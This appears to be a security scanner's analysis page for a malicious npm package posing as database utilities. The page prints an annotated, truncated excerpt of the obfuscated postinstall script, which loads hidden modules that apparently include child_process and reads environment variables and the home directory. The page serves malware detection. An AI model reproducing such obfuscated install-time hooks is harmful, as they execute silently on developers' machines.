// npm package
@cloudplatform-single-spa/svp-baas
Internal database utilities with connection pooling, query builder and migration support
weekly
112
monthly
112
versions
3
maintainers
1
license
UNLICENSED
first publish
2026-05-27
publisher
mr.4nd3r50n
tarball
17,379 B
AUTO-PUBLISHED·1 version indexed·latest published 2026-05-28
// exfil path
what is read → where it ships
steals
- ○ home dir
sends to
(no destination string extracted — payload may be dynamic / obfuscated)
evidence in excerpt
> 'use strict';const a0_0x4aefa3=a0_0x4799;(function(_0x188295,_0x277723){const _0xb11819=a0_0x4799,_0x5db401=_0x188295();while(!![]){try{const _0x33a509=-parseInt(_0xb11819(0x19b))/(0x778+0xa67+-0x2*0x…// publisher campaignby mr.4nd3r50n
9 caught packages from this account
This is not an isolated catch. The same publisher has shipped 8 other packages that our pipeline flagged — the shape of a coordinated campaign, not a one-off. Each link below opens that sibling's analysis.
// offending code· @100.100.100· 1 file flagged
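llm: benign · 0.85 → No suspicious destination, no remote-exec shape — 1 known-vendor host(s). Note that this LLM verdict disagrees with the other signals recorded for this version (heuristic 100/100, OSV entry MAL-2026-4978, an obfuscated postinstall script that reads environment variables and the home directory), so it does not clear the package.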
- @100.100.100 · AUTO-PUBLISHED · publisher: mr.4nd3r50n · heuristic 100/100 · static flags 2 · llm benign (0.85) via ollama · install-scripts:postinstall · new-publisher:1d · anomalous-major-version:100 · publisher-multi-name-burst:24 · publisher-version-pump:25 · osv-flagged:MAL-2026-4978 · reads-env-vars · reads-homedir
→ No suspicious destination, no remote-exec shape — 1 known-vendor host(s).
// offending code · 1 file flagged · patterns: 2
// Listing of the flagged package contents as captured on this page. The page
// collapsed every file onto two long lines; the line breaks below are restored
// and the text is otherwise unchanged.
--- install scripts ---
// npm runs the postinstall lifecycle script automatically after the package is
// installed, so scripts/postinstall.js executes without the package ever being
// imported. Installing with --ignore-scripts prevents that execution.
### postinstall
node scripts/postinstall.js
### prepublishOnly
echo 'Building...'
--- package/scripts/postinstall.js (excerpt) ---
// Obfuscated installer script. Only the start of the file is shown: the
// definitions of a0_0x4799 and a0_0x1420 are outside the excerpt, so none of
// the looked-up strings can be resolved from this page.
'use strict';
// Alias for the lookup function that every a0_0x4aefa3(0x...) call below uses.
const a0_0x4aefa3=a0_0x4799;
// Start-up shuffle: takes the array returned by a0_0x1420() and keeps moving
// its first element to the end until an arithmetic check over parseInt() of
// several looked-up entries equals the constant passed as second argument.
// A mismatch or an exception simply triggers another rotation.
(function(_0x188295,_0x277723){const _0xb11819=a0_0x4799,_0x5db401=_0x188295();while(!![]){try{const _0x33a509=-parseInt(_0xb11819(0x19b))/(0x778+0xa67+-0x2*0x8ef)*(-parseInt(_0xb11819(0x1a3))/(0x1474+0x9*-0x3eb+-0x1*-0xed1))+parseInt(_0xb11819(0x1ce))/(-0x2*0xb32+-0x1db1+-0x4*-0xd06)+-parseInt(_0xb11819(0x1c2))/(-0xf97+0x29*-0x37+0xa*0x271)*(-parseInt(_0xb11819(0x176))/(0xc5*-0x2d+0x1269+0x103d))+parseInt(_0xb11819(0x191))/(-0x1029+0x6*0x431+-0x8f7)+-parseInt(_0xb11819(0x161))/(-0x30*-0x4+0xa6*0xf+-0xa73)+-parseInt(_0xb11819(0x1a2))/(-0x4*-0x72b+0x225a+-0x3efe)*(-parseInt(_0xb11819(0x1ba))/(-0x1b4f+0x2c*-0xe0+0x41d8))+parseInt(_0xb11819(0x1a4))/(-0x47*0x79+0x6f1+0x355*0x8)*(-parseInt(_0xb11819(0x1bd))/(-0x1*-0x1595+0x3*-0x365+-0xb5b));if(_0x33a509===_0x277723)break;else _0x5db401['push'](_0x5db401['shift']());}catch(_0x37ee09){_0x5db401['push'](_0x5db401['shift']());}}}(a0_0x1420,-0x8d8ee+-0xfcb91+-0x1*-0x2136cd));
// Module handles. Only os and fs are named in clear text.
const a0_0x31d245=require('os'),
a0_0x457774=require('fs'),
// Three further modules whose names are hidden behind the string lookup.
a0_0x5c5cd7=require(a0_0x4aefa3(0x16c)),
a0_0x59d0f4=require(a0_0x4aefa3(0x16f)),
a0_0x3f9b94=require(a0_0x4aefa3(0x19e)),
// execSync and spawn are the process-launching functions of the Node
// child_process module, so the hidden module name is presumably child_process
// (to confirm once the string table is decoded).
{execSync:a0_0x3cd3ac,spawn:a0_0xdad650}=require(a0_0x4aefa3(0x183)),
// String constants taken from the lookup; their values are not visible here.
// a0_0x29469c is used further down as a prefix of an environment variable name.
a0_0x5f2032=a0_0x4aefa3(0x186),
a0_0xc7f5f2=a0_0x4aefa3(0x1cb),
a0_0x29469c=a0_0x4aefa3(0x1b4)+a0_0x4aefa3(0x1c9),
a0_0x70af96=a0_0x4aefa3(0x187),
// True when the environment variable named by a0_0x70af96 is set.
a0_0x5d94fe=!!process.env[a0_0x70af96],
// The left operand compares one lookup result with itself, so it appears to be
// always true and the RECON_ONLY environment check on the right is never
// reached. What this flag gates is not visible in the excerpt.
a0_0x249cb8=a0_0x4aefa3(0x16e)===a0_0x4aefa3(0x16e)||!!process.env[a0_0x29469c+'RECON_ONLY'];
// The excerpt is cut off here, at the start of a function declaration.
function
--- bundled output (OSV-MAL flagged — LLM scope expansion) ---
--- dist/index.d.ts (bundled) ---
// Type declarations for the advertised database API. These are signatures
// only; no implementation is shown on this page.
export interface PoolOptions { host?: string; port?: number; database?: string; user?: string; password?: string; max?: number; }
export interface Pool { host: string; port: number; database: string; }
export function createPool(options?: PoolOptions): Pool;
export function query(pool: Pool, sql: string, params?: unknown[]): Promise<unknown[]>;
export function transaction(pool: Pool, fn: (client: unknown) => Promise<unknown>): Promise<unknown>;
export function migrate(pool: Pool, dir?: string): Promise<string[]>;
--- dist/index.js (bundled) ---
// The entry point only re-exports ../src/index.js, which is not shown on this
// page. The page fused the original comment and the module.exports statement
// onto one line; the line is kept exactly as captured.
'use strict'; // dist/index.js module.exports = require('../src/index.js');
